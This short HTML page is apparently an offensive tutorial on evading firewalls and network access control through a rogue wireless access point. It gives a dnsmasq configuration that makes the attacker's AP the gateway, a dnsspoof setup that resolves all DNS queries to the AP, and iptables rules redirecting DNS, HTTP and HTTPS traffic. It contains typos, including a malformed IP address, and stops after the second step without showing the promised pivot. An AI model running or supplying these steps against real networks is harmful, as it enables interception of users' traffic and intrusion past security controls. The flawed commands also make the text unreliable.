<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Firewall &amp; NAC Evasion - Indirect Wireless Pivots</title>
</head><body><b><u>FIREWALL AND NAC EVASION USING INDIRECT WIRELESS PIVOTS<br/>
</u></b><br/>
We can pivot from one segreated VLAN to another, bypassing firewall and NAC mechanisms in the process. <br/>
<br/>
1) Configure Linux as a captive portal<br/>
Copy the following code in to dnsmasq.conf<br/>
<i>(locate command to find a file)</i><br/>
<span style="font-family: Serif"># define DHCP pool<br/>
dhcp-range=10.0.0.80,10.0.0.254,6h<br/>
# set phy as nameserver<br/>
dhcp-option=6,8.8.8.8<br/>
# set rogue AP as Gateway<br/>
dhcp-option=3,10.0.0.1 #Gateway<br/>
dhcp-authoritative<br/>
log-queries<br/>
<br/>
2) Start dnsspoof as the nameserver, cofngiuring it to resolve all DNS queries to our access point's IP<br/>
</span>:~# echo '10.0.01' &gt; dnsspoof.conf<br/>
:~# dnsspoof -i <b>wlan0 </b>-f ./dnsspoof.conf<br/>
:~# iptables --table nat --append PREROUTING --protocol udp --destination-port 53 --jump REDIRECT --to-port 53<br/>
:~# iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-port 80<br/>
:~# iptables --table nat --append PREROUTING --protocol tcp --destination-port 443 --jump REDIRECT --to-port 443<br/>
</body></html>